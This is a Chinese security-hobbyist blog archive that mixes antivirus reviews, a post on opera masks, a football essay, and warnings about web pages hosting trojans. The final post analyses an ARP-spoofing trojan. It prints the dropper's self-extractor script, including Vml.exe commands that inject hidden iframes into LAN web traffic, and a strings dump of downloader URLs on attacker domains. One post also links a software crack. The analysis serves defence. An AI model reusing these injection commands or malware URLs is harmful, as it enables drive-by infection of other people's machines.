Archive for the ‘jun0717专栏’ Category

访问使用ITSUN统计的网站时软件报毒说明及提醒

请大家在访问有使用ITSUN统计的网站时特别注意:

每个IP第一次访问使用ITSUN统计的网站后,计数加1(仅第一次),返回count2.htm:

http://58.49.58.106/count2.htm

问题出现在此返回网页中,今天发现挂马更新成:

http://999.dywoyk88.cn/hast.exe(最新挂)

已知最近前三次挂马分别为:

http://999.dywoyk88.cn/cast.exe(第三次)
http://999.dywoyk88.cn/most.exe(第二次)
http://222.73.254.67/moon.exe(第一次)

中国传统戏曲脸谱的各种颜色

  中国传统戏曲脸谱的各种颜色分别代表的意义为:

红色:代表忠贞、英勇的人物性格,如:黄飞虎、关羽。

蓝色:代表刚强、骁勇、有心计的人物性格,如:窦尔敦。

黑色:代表正直、无私、刚直不阿的人物形象,如:包公。

白色:代表阴险、疑诈、飞扬、肃煞的人物形象。如:曹操。

绿色:代表顽强、暴躁的人物形象。如:武天虬。

黄色:代表枭勇、凶猛的人物,如:宇文成都。

紫色:代表刚正、稳练、沉着的人物。

金色、银色:代表各种神怪形象。

眉间两颊三片红,一块粉白七笔黑。

久违的金山,久违的感觉

  曾记得上次用它时,它还处在和X星互杀各自正常文件的不理智的阴暗的竞争时代。那种感觉,让我遗弃至今,2008了,还是看看吧:

  实时防护那里,记得一直有会员提说加上Ask User即“通知并让用户选择处理”的,可它就是不加,默认还是先杀,还是所谓的“抢先式”:

  
 
  手动的倒是有,可明理的即知,实时防护直接杀,手动询问也是无济:

  

Continue Reading »

ArcaVir2008初窥

  首先感谢alax\jick117\Proll三位弟弟的热情帮助:[s:62]

  仅仅以为是增加了Http功能,才急于想测试一下。结果,没想到它的进步、它的改观,让我惊大于喜。

  

  

  假如提示找不到文件的,可看一下,其实存在的:C:\Documents and Settings\Administrator\Local Settings\Temp\IXP000.TMP\vcredist.msi
  
  

  14天的试用Key,将就着用用吧。alax的破解方法在:http://bbs.crsky.com/read.php?tid=1245117

  

  多了四个模块,让我吃惊的是,它在加了Http监控的同时,居然又加上了RegMon,野心~~~

  

  记得有许多朋友说ArcaVir在Web Http监控方面薄弱的,现在好了,估计说的朋友会少很多了。那似RD功能的,放在后面说吧。  

  重启后,弹出的第一个对话框却是提示Tencent的TM,呵,可启发式还是中级呢:

  

Continue Reading »

Malwarebytes’ Anti-Malware试用及Bug再次提交

  官  网:http://www.malwarebytes.org

  下载地址:http://www.malwarebytes.org/mbam/program/mbam-setup.exe

  放手头上有些天了,因为版本更新速度很快,从Version 0.70到7.1,7.2到Version 0.76,从另一方面说明软件本身目前的不完善性。
  在0.75时试用了,发现问题,提交不久,官方就放出0.76,以为得到改进,结果此版本仍未改进。

  安装后打开界面,默认为Quick Scan即快速扫描,主要扫描系统盘、注册表等信息:

Continue Reading »

世界杯 我们依然是看客

世界杯 我们依然是看客

  中心:中国足球其实就是一个梦想中的空中楼阁,下面站着一帮只想修顶楼不想打基础的人们,这样的楼,还没修就已经先垮了。
  
  北京时间2007年11月25日晚,2010年南非世界杯预选赛抽签仪式在南非德班正式开始。最终的抽签结果令中国球迷大为担心:中国与卡塔尔、伊拉克、澳大利亚同分在第一小组,这样中国队进入了一个名副其实的死亡之组。抽签结果出来之后,连国足领队都说这是中国队预选赛历史上抽到的最坏的签。

  对于中国足球来说,我真的不明白哪个组才不算死亡之组,当连新家坡、泰国这些球队都敢输的时候,我想中国足球队的理想对手就只剩下中国香港、中国澳门、中国台北了,就算打不赢,好歹是一家人,给老大哥面子,得放放水啥的,尽管这样,我也怀疑不一定能出线,上一届预选赛和香港的7:0就是个例子,本想玩死别人的,谁知道两兄弟因为数学教育没搞上去,不会算净胜球,反被人家生生玩死,对于中国队来说,这是“死亡之组”,对于其他队来说,这是“玩死之组”,国足就是这么幽默,就算你下决心发毒誓要跟他决裂,他总会在被玩死之后半夜三更阴魂不散诈尸般跑出来幽你一默。

  2002年,在张吉龙的外交手腕下,中国队抽出了亚洲,抽进了世界杯,让国人们很是兴奋了一把,一想到阎世铎迷着眼睛喊:“中国足球从此站起来了”,我就觉得很搞,太搞了,土鳖去了趟海洋馆,回来就开始戴上博士帽冒充海龟(海归)了,就像阿Q扛着褡裢从城里回来,连自己都觉得像是真的发财了一样,尽管这钱的来路实在不那么光明。

  国足的结局和阿Q的结局差不了多少,最后净吞九蛋,灰溜溜地回来了,胜一场平一场进一球的目标成为了笑料。2002年的世界杯是中国足球最经典的一次诈尸,明明是蛤蟆,千方百计跑高速公路上装啥迷彩小吉普车,结果当然只有一个:被真吉普压死。

  按理说来,足协那帮人应该是无神论者才对,可是天天在等上帝的帮忙,外教是上帝,米卢就是上帝中的上帝。可是这帮人今天去荷兰明天去南斯拉夫“考察”的时候,就没想过,神其实是自己制造的,我们为什么不制造属于我们的神,优秀的教练、优秀的球员,不是石头里蹦出来的,也不是上帝派下来的,为什么不培养我们的教练,为什么不把这些考察的钱放在足球学校的建立上面,放到足球知识的普及上面?中国人的足球知识,贫瘠的像是非洲的土地。一次,我在看上海申花和北京国安的比赛,一哥们见着了,批评我没追求,居然看中国足球,然后就不断地说中国足球是如何的差,球员素质是如何的差,然后对着屏幕说:“啊,这球传得多好啊,咋裁判就吹了呢?”我说越位了,这哥们腆着脸问:啥叫越位?我说你连越位都不知道,哪来那么多批评?

  其实,我很理解这位哥们,就像有人听说某个面馆卖的面条有苍蝇,于是大家都说这家面馆有苍蝇——尽管一半的人甚至连这家面馆的门向哪边开都不知道。中国足球就是这样一家面馆——不,应该更像面馆隐蔽处的痰盂,因臭闻名,谁都想往里吐一口。

  这真是一次糟糕的抽签,比抽筋还难受,我们能赢卡塔尔?有点可能但是不大,对方有许多更改了国籍的雇佣军,我们能赢那个差点把意大利和黄健翔逼疯的澳大利亚?洗洗睡吧。我们能赢伊拉克?这个已经试过了,不行,面对这个上空有人在扔炸弹都还能训练的球队,不管是踢球还是踢人都赢不了,我最讨厌打不过还死撑着喊什么宁愿站着死也不跪着生的人,绵羊夹根扫把装什么大尾巴狼。

  中国足球其实就是一个梦想中的空中楼阁,下面站着一帮只想修顶楼不想打基础的人们,这样的楼,还没修就已经先垮了。

  许多事情真的很戏剧化,在我们还在为发明火药而洋洋自得的时候,别人已经用大炮轰开我们的大门了,当我们还在吹牛说足球运动的起源是我们的蹴鞠,还有个球王叫高俅的时候,我们还没比赛就被抽签直接抽死了,这样说真有点长他人志气灭自己威风,尽管我真的很爱国,但在足球上面我们确实从上到下都威风不起来,我们就像打扑克的技术不行还老当地主,总是被斗,不出老千还真没办法摸到两个王四个二,唱唱空城计咋呼两下还行,威风那完全是梦想,如果想赢得世界杯那简直是神经病而且病得不轻。

  写到斗地主我突然觉得我们在桌上运动中就很行,不管是扑克还是麻将或者乒乓球,可能是因为几十辈人热中于围着桌子开会开出来的优良传统,我想要是把足球比赛放到桌子上或者会议室里进行,咱们肯定是冠军。

  想起2002年在一个很大的广场看世界杯,上千人坐得满满的,对着大屏幕,加油声,国歌声震天,想起那些在各种场合的仪式中都只对口型不发声的青年们也可以如此热血沸腾,我突然觉得很遥远,远到你很难去奢望下一次出现这样激情而动人的场面会是好久。

  预选赛的第一场比赛将在除夕夜进行,客场对伊拉克,这真的有点残忍,比看春晚这个千篇一律以人多和抹胭脂取胜的晚会还残忍。

  当足球评论员李承鹏和他的哥们在讨论是洗洗睡还是不洗直接睡了的时候,国足起了个大早却连晚集都没赶上,还不睡就已经先洗了,用李伯清的话说就是,洗白了。

  2010年,我们注定再一次成为世界杯的看客,我们只能怀念过去,尽管用《士兵突击》里许三多的话说,这没意义,什么是有意义呢?许三多说了,好好活就是有意义,生活总是时不时带给我们失望,但我们只能好好活,如何好好活呢?三多也说了,好好活就是做很多有意义的事情。

NOD32.Update Info

http://www.eset.eu/support/update-xy1

ARP攻击一例

htp://xx.exiao02.com/wm/5.htm
挂:htp://bbb.ehai01.com/0.exe,此为下载型木马,下载htp://bbb.ehai01.com/1~24.exe文件,拿一下载文件解压:

  1. ;下面的注释包含自解压脚本命令
  2. Path=%systemroot%\system32\
  3. SavePath
  4. Setup=3.vbs
  5. Silent=1
  6. Overwrite=1
  7. Set ws = CreateObject("Wscript.Shell")
  8. ws.run "cmd /c run.bat",vbhide
  9. Vml.exe -idx 0 -ip 192.168.0.1-192.168..254 -port 80 -insert "<ifr ame src='htp://xx.exiao01.com/2.htm' width=20 height=1></ifr ame>"
  10. Vml.exe -idx 0 -ip 192.168.1.1-192.168.1.254 -port 80 -insert "<ifr ame src='htp://xx.exiao01.com/2.htm' width=20 height=1></ifr ame>"
  11. exit

00003890 00404490 0 URLDownloadToFileA
000038A4 004044A4 0 C:\Program Files\1.exe
000038BC 004044BC 0 http://1.ehai01.com/1.exe
000038FC 004044FC 0 C:\Program Files\2.exe
00003914 00404514 0 http://1.ehai01.com/2.exe
00003954 00404554 0 C:\Program Files\3.exe
0000396C 0040456C 0 http://1.ehai01.com/3.exe
000039AC 004045AC 0 C:\Program Files\4.exe
000039C4 004045C4 0 http://1.ehai01.com/4.exe
00003A04 00404604 0 C:\Program Files\5.exe
00003A1C 0040461C 0 http://1.ehai01.com/5.exe
00003A5C 0040465C 0 C:\Program Files\6.exe
00003A74 00404674 0 http://1.ehai01.com/6.exe
00003AB4 004046B4 0 C:\Program Files\7.exe
00003ACC 004046CC 0 http://1.ehai01.com/7.exe
00003B0C 0040470C 0 C:\Program Files\8.exe
00003B24 00404724 0 http://1.ehai01.com/8.exe
00003B64 00404764 0 C:\Program Files\9.exe
00003B7C 0040477C 0 http://1.ehai01.com/9.exe
00003BBC 004047BC 0 C:\Program Files\10.exe
00003BD4 004047D4 0 http://1.ehai01.com/10.exe
00003C14 00404814 0 C:\Program Files\11.exe
00003C2C 0040482C 0 http://1.ehai01.com/11.exe
00003C6C 0040486C 0 C:\Program Files\12.exe
00003C84 00404884 0 http://1.ehai01.com/12.exe
00003CC4 004048C4 0 C:\Program Files\13.exe
00003CDC 004048DC 0 http://1.ehai01.com/13.exe
00003D1C 0040491C 0 C:\Program Files\14.exe
00003D34 00404934 0 http://1.ehai01.com/14.exe
00003D74 00404974 0 C:\Program Files\15.exe
00003D8C 0040498C 0 http://1.ehai01.com/15.exe
00003DCC 004049CC 0 C:\Program Files\16.exe
00003DE4 004049E4 0 http://1.ehai01.com/16.exe
00003E24 00404A24 0 C:\Program Files\17.exe
00003E3C 00404A3C 0 http://1.ehai01.com/17.exe
00003E7C 00404A7C 0 C:\Program Files\18.exe
00003E94 00404A94 0 http://1.ehai01.com/18.exe
00003ED4 00404AD4 0 C:\Program Files\19.exe
00003EEC 00404AEC 0 http://1.ehai01.com/19.exe
00003F2C 00404B2C 0 C:\Program Files\20.exe
00003F44 00404B44 0 http://1.ehai01.com/20.exe
00003F84 00404B84 0 C:\Program Files\21.exe
00003F9C 00404B9C 0 http://1.ehai01.com/21.exe
00003FDC 00404BDC 0 C:\Program Files\22.exe
00003FF4 00404BF4 0 http://1.ehai01.com/22.exe
0000403C 00404C3C 0 C:\Program Files\explorer.exe
0000405C 00404C5C 0 http://da.ehai01.com/23.exe
0000409C 00404C9C 0 C:\Program Files\arpqc.exe
000040B8 00404CB8 0 http://da.ehai01.com/24.exe